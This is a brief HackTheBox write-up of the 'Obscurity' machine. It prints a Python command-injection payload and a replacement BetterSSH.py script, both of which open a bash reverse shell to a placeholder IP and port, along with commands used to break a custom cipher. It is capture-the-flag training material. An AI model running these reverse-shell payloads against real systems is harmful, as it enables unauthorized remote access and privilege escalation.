HTB Obscurity Write-up

less than 1 minute read

Obscurity is a 30-point Linux machine on HackTheBox that involves exploiting a command injection in a custom webserver, breaking a simple cipher and abusing file system permissions to get root. My walkthrough is available on youtube:

Notes


Command injection payload:

';__import__("os").system("bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'")+'

Retrieving the key:

python3 SuperSecureCrypt.py -d -i out.txt -k "`cat check.txt`" -o key

Decrypting the ssh password:

python3 SuperSecureCrypt.py -d -i passwordreminder.txt -k alexandrovich -o /dev/shm/x

Replaced BetterSSH.py:

import os
os.system("bash -c 'bash -i >& /dev/tcp/<ip>/<port> 0>&1'")

Updated: